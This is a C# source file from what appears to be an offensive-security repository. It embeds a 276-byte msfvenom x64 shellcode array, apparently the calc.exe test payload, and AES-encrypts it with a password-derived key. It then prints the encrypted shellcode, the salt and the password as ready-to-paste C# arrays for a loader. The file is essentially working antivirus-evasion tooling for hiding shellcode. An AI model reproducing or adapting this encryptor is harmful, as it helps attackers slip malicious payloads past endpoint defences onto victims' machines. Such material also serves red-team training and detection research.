-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy path04a_encryption_aes.cs
106 lines (88 loc) · 4.61 KB
/
04a_encryption_aes.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
using System;
using System.IO;
using System.Text;
using System.Security.Cryptography;
public class EncryptionProgram
{
static void Main(string[] args)
{
// CHECK IF PASSWORD IS PROVIDED
if (args.Length == 0)
{
Console.WriteLine("Password is required as a command line argument.");
return;
}
// ASSIGN CLA AS password BYTE ARRAY
string password = args[0];
// SHELLCODE FROM MSFVENOM ASSIGNED AS payload BYTE ARRAY
byte[] payload = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00};
// WE TURN OUR PASSWORD INTO A KEY USING SHA256 HASH
byte[] encryptionKey;
using (var hashAlgorithm = SHA256.Create())
{
encryptionKey = hashAlgorithm.ComputeHash(Encoding.UTF8.GetBytes(password));
}
// GENERATE OUR SALT
byte[] salt = GenerateRandomSalt(16);
// GENERATE OUR ENCRYPTED PAYLOAD
byte[] encryptedPayload = EncryptData(payload, encryptionKey, salt);
// PRINT ALL RESULTS TO CONSOLE
StringBuilder formattedPayload = new StringBuilder();
formattedPayload.Append("byte[] aesshellcode = new byte[");
formattedPayload.Append(encryptedPayload.Length);
formattedPayload.Append("] {");
for (int i = 0; i < encryptedPayload.Length; i++)
{
formattedPayload.Append("0x");
formattedPayload.AppendFormat("{0:x2}", encryptedPayload[i]);
if (i < encryptedPayload.Length - 1)
{
formattedPayload.Append(",");
}
}
formattedPayload.Append("};");
Console.WriteLine(formattedPayload.ToString());
Console.WriteLine("");
StringBuilder formattedSalt = new StringBuilder();
formattedSalt.Append("byte[] salt = new byte[] {");
for (int i = 0; i < salt.Length; i++)
{
formattedSalt.Append(salt[i]);
if (i < salt.Length - 1)
{
formattedSalt.Append(", ");
}
}
formattedSalt.Append("};");
Console.WriteLine(formattedSalt.ToString());
Console.WriteLine("");
Console.WriteLine(String.Format("byte[] passwordBytes = Encoding.UTF8.GetBytes(\"{0}\");", password));
}
public static byte[] EncryptData(byte[] data, byte[] key, byte[] salt)
{
using (var memoryStream = new MemoryStream())
using (var encryptor = new RijndaelManaged())
{
encryptor.KeySize = 256;
encryptor.BlockSize = 128;
var keyGenerator = new Rfc2898DeriveBytes(key, salt, 1000);
encryptor.Key = keyGenerator.GetBytes(encryptor.KeySize / 8);
encryptor.IV = keyGenerator.GetBytes(encryptor.BlockSize / 8);
encryptor.Mode = CipherMode.CBC;
using (var cryptoStream = new CryptoStream(memoryStream, encryptor.CreateEncryptor(), CryptoStreamMode.Write))
{
cryptoStream.Write(data, 0, data.Length);
}
return memoryStream.ToArray();
}
}
public static byte[] GenerateRandomSalt(int size)
{
byte[] salt = new byte[size];
using (var rng = new RNGCryptoServiceProvider())
{
rng.GetBytes(salt);
}
return salt;
}
}